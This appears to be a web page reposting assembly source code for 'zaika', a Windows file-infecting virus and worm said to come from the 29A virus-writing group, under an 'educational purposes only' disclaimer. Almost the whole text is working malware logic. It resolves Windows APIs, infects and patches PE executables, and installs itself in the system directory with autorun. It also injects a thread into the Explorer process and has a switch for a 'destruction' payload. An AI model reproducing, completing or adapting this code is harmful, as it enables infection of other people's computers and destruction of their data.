29a-7.016

从29A上收集的病毒源码

;============================zaika==============================;
;    This source is for educational purposes only. Author does not take		;
;            responsibility for the consequences of its usage				;
;					This is open-source program								;
.586
locals 
jumps
.model flat, stdcall


DEBUG equ 0			; debug console
RELEASE	equ 1	; 
NORELEASE	equ 0
;RELEASE=0 NORELEASE=1 - 	destruction off, infecting *.MZD, 
;					beep at infection
;RELEASE=1 NORELEASE=0 - 	destruction on,  infecting *.EXE

callW macro f
extrn f:proc
	call f
endm

include windows.inc
include consts.inc
include pestruct.inc
include structs.inc
include eaxapi1.inc ;definitions of macro
MB_TOPMOST	equ 40000h

.data
start:

	mov 1 ptr [dropper], 1
	lea eax, [_start]
	push esp esp 0 0 eax 10000h 0
	callW CreateThread
	pop ecx

	
_exit:
	push 30000
	callW Sleep
	push 0
	callW ExitProcess


;org 100h
db ".beg."
virstart:
_realstart:
	;  after decryption execution gets here
_start:
	call recalc
recalc:
rec	db 5Dh ; pop ebp

	call get_kernel
	push kernel32_api_num
	pop ecx
__Kernel32 equ _LoadLibraryA-5
	lea esi, [ebp+__Kernel32-rec]
	call get_apis ; get kernel32 apis

	lea eax, [ebp+thread1-rec]
	push esp esp 0 0 eax 10000h 0
	xcall CreateThread
	pop ecx


	; if worm, copy to sysdir, set autorun & exit
	cmp 1 ptr [ebp+worm-rec], 0
	jz __5687
	call worm_startup
	push 3000
	xcall Sleep
	push 0
	xcall ExitProcess
__5687:


	; restore host program if not dropper
	cmp 1 ptr [ebp+dropper-rec], 0
	jnz __567
	lea ebx, [ebp+replace-rec]
	mov edi, [ebx].to_rva
	lea esi, [ebp+backup-rec]
	mov ecx, [ebx].sizeinbytes
	pushad
	push esp
	push esp
	push PAGE_READWRITE
	push ecx
	push edi
	xcall VirtualProtect
	pop eax
	popad
	rep movsb
	; restore jmp
	cmp 1 ptr [ebp+isjmp-rec], 0
	jz __567

	lea ebx, [ebp+jmpreplace-rec]
	mov edi, [ebx].to_rva
	lea esi, [ebp+jmpbackup-rec]
	mov ecx, jmpsize
	pushad
	push esp
	push esp
	push PAGE_READWRITE
	push ecx
	push edi
	xcall VirtualProtect
	pop eax
	popad
	rep movsb

__567:
	

_out:
	cmp 1 ptr [ebp+dropper-rec], 0
	jz __return_to_host
	; exit thread if dropper
	push 0
	xcall ExitThread
__return_to_host:
	; return to host if not dropper
	lea eax, [ebp+__jmp_addr+4-rec]
	mov ecx, [ebp+retaddr-rec]
	sub ecx, eax
	mov [ebp+__jmp_addr-rec], ecx
	popad
	db 0E9h	; jmp far
__jmp_addr	dd ?
	nop

retaddr	dd offset _exit;401000h

; macro
copy_to_stack	macro thread1, _stack_exec1
local ddx
local begin
thread1:
begin:
	call ddx
ddx:
	pop ebp
	sub ebp, (ddx-recalc)
	mov eax, ebp
	sub eax, esp
	cmp eax, (recalc-virstart); test if we are in stack
	jz _stack_exec1
	; not in stack
	; copy ourselves to stack
	sub esp, virsize
	and esp, -4 ; align esp to 4 
	mov edi, esp
	lea esi, [ebp+virstart-rec]
	mov ecx, virsize
	rep movsb
	lea eax, [esp+(thread1-virstart)]
	jmp eax
endm

	copy_to_stack thread1, _stack_exec1

_stack_exec1:
	sub esp, 500h

;	mov 1 ptr [ebp+worm-rec], 0		; clear worm flag
	call loaddll2

IF DEBUG EQ 1
__msvcrt	equ	_sprintf-5
	lea eax, [ebp+_msvcrt-rec]
	push eax
	xcall LoadLibraryA
	mov [ebp+_Default-rec], eax
	lea esi, [ebp+__msvcrt-rec]
	push msvcrt_api_num
	pop ecx
	call get_apis
ENDIF

;)	
openm:
	lea eax, [ebp+mutexname-rec]
	push eax
	push 1
	push 1f0001h	; MUTEX_ALL_ACCESS
	xcall OpenMutex

	; wait for release of mutex
	mov 4 ptr [ebp+hmutex-rec], eax
	test eax, eax
	jz processing
	push -1
	push eax
	xcall WaitForSingleObject

	; mutex is released

processing:
	sub eax, eax
	mov 1 ptr [ebp+isseh-rec], al

;	jmp run_local_thread
	; let us go

	; look for explorer
	push 'd'
	push 'nWya'
	push 'rT_l'
	push 'lehS' ;Shell_TrayWnd
	mov eax, esp
	push 0
	push eax
	xcall FindWindowA
	or eax, eax
	jz foregr_win;exit_thread1
	mov esi, eax
	add esp, 16
	jmp cy1
	; if no explorer, get topmost window
foregr_win:
	xcall GetForegroundWindow
	mov esi, eax

cy1:
	push eax
	push esp
	push eax
	xcall GetWindowThreadProcessId
	pop edx
	or eax, eax
	jz exit_thread1
	mov edi, eax


;efork(pid, paddr, icaddr, ofs, ics, hwnd, thid)
	push edi
	push esi
	push virsize+1
	push (thread2-virstart)
	lea eax, [ebp+virstart-rec]
	push eax
	push 0 
	push edx
	call efork
	or eax, eax
	jnz exit_thread1

	; run local thread if we can not run remote one
run_local_thread:
	lea eax, [ebp+thread2-rec]
	push esp esp 0 0 eax 10000h 0
	xcall CreateThread
	pop ecx

exit_thread1:



	push 200
	xcall Sleep	; wait while thread copies itself to stack
	push 0
	xcall ExitThread	; exit

__mutex_name 	equ "fg", 0
__hmap 	db 0

; stack variables

valuessize 	equ 400h ; local stack values size
; variables begin at ebp-8
_thid	equ ebp-08h
_hwnd	equ ebp-0Ch
fdata 	equ ebp-4 ptr 150h
ahand		equ ebp-4 ptr 154h	
hmap		equ ebp-4 ptr 158h
fbase		equ ebp-4 ptr 15Ch
rvaalloc 	equ ebp-4 ptr 160h
i		equ ebp-4 ptr 164h
fsize		equ ebp-4 ptr 168h
newfsize	equ ebp-4 ptr 16Ch
fpos		equ ebp-4 ptr 170h
rvapos	equ ebp-4 ptr 174h
loaderbuf	equ ebp-4 ptr 178h	; pointer to loader buffer 
virbuf	equ ebp-4 ptr 17Ch	; pointer to virus buffer 
hmap		equ ebp-4 ptr 180h
tbl	equ ebp-4 ptr 184h
jmpofs	equ ebp-4 ptr 188h
injofs	equ ebp-4 ptr 18Ch
loaderphysaddr 	equ ebp-4 ptr 190h
newimagesize 	equ ebp-4 ptr 194h
newsectionvirtsize	equ ebp-4 ptr 198h
newsectionphyssize	equ ebp-4 ptr 19Ch
diffaddr	equ ebp-4 ptr 1A0h
codesegphysaddr	equ ebp-4 ptr 1A4h
enchash	equ ebp-4 ptr 1ACh		; 	hash [8 bytes]
hfind equ ebp-4 ptr 1B0h
tempdir	equ ebp-1 ptr 2B0h
tempdirl	equ ebp-1 ptr 3B0h
success	equ ebp-4 ptr 3B4h	;